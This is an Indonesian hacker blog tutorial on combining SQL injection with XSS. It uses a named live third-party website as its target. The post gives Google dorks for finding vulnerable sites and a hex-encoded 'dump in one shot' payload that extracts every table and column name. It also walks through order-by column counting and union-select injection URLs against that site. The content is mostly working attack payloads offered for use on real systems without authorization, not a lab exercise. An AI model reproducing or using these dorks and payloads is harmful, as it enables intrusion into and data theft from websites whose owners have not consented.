XSS TO SQL

Assalamualaikum bro hehe, setelah sekian lama akhirnya gw comeback juga:v, oke. Kali ini gw mau share kpd kalian tutorial "XSS In SQL Injection" Oke lgsg saja kita mulai

Apa itu XSS In SQL Injection ?

Nah jadi, teknik ini sebenarnya tidak jauh berbeda dengan SQL Injection manual seperti biasa. Akan tetapi didalam query sql injection nanti kita masukan sebuah script xss

Bahan - bahan yang kita butuhkan :

Dork : inurl:/product.php?id=

inurl:/news.php?id= site:co.uk

Untuk Dios nya bisa Kalian pake :

concat(0x3c7363726970743e70726f6d70742822,(select%20@a%20from(select%20(@a:=0x00),(select%20@a%20from%20information_schema.columns%20where%20@a%20in(@a:=concat(@a,table_name,%27=%3E%27,column_name,%27||%27))))a),0x222c646f63756d656e742e646f6d61696e293c2f7363726970743e)

Kita mulai saja mengunakan live Target "https://cartographic.info/uk_street/map.php?id=-33105"

Oke... Selanjutnya mari kita Cuba check web ini tuh Vuln apa enggak, cara nya tuh seperti ini, kalian cukup tambahkan tanda string (') di akhir parameter nya, Jika Tampilannya seperti contoh dibawah ini, berarti Vuln

Menentukan Jumlah Columns

Nah, langkah selanjutnya adalah menentukan berapa jumlah kolom dari table di database yang digunakan pada website tersebut. Untuk caranya kita seperti

biasa menggunakan order by dan sampai menemukan diangka berapa terdapat error

https://cartographic.info/uk_street/map.php?id=-33105%27+order+by+1--+- ( Blum Eror )

https://cartographic.info/uk_street/map.php?id=-33105%27+order+by+2--+- ( Blum Eror )

https://cartographic.info/uk_street/map.php?id=-33105%27+order+by+3--+- ( Blum Eror )

https://cartographic.info/uk_street/map.php?id=-33105%27+order+by+4--+- ( Blum Eror )

https://cartographic.info/uk_street/map.php?id=-33105%27+order+by+5--+- ( Blum Eror )

https://cartographic.info/uk_street/map.php?id=-33105%27+order+by+6--+- ( Blum Eror )

https://cartographic.info/uk_street/map.php?id=-33105%27+order+by+7--+- ( Blum Eror )

https://cartographic.info/uk_street/map.php?id=-33105%27+order+by+17--+- ( EROR :V )

Selanjutnya mencari angka togel

Seperti biasanya, angka togel atau bisa disebut juga dengan nama magic number ini bisa kita dapatkan dengan menjalankan payload "union select"

( https://cartographic.info/uk_street/map.php?id=-33105%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--+- )

Setelah saya menjalankan payload tersebut, disini output angka ajaibnya adalah 10,11,12

Langkah yang terakhir kita masukin Dios SQL to xss nya, kita masukin Dios nya di angkat yang muncul tadi yah, dengan contoh

https://cartographic.info/uk_street/map.php?id=-33105%27+union+select+1,2,3,4,5,6,7,8,9,concat(0x3c7363726970743e70726f6d70742822,(select%20@a%20from(select%20(@a:=0x00),(select%20@a%20from%20information_schema.columns%20where%20@a%20in(@a:=concat(@a,table_name,%27=%3E%27,column_name,%27||%27))))a),0x222c646f63756d656e742e646f6d61696e293c2f7363726970743e),11,12,13,14,15,16--+-

Kemudian tinggal jalankan, apabila sukses website tersebut akan menampilkan popup

Oke bro, berhasil - oke mungkin sekian dulu dari, tq

XSS TO SQL

ArdhyanXTzy

Posting Komentar

Author Profile

Social Plugin

Popular Posts

DEFACE POC CandySKL Default Username & Password | New 2022

Mencari Celah Bug Open Redirect Vulnerability

VN FCKeditor Upload File/Shell Vulnerability

Laravel RCE Remote Code Execution | With APP_KEY (CVE - 2018 - 15133)

Labels

Product Services

Best Services

Contact form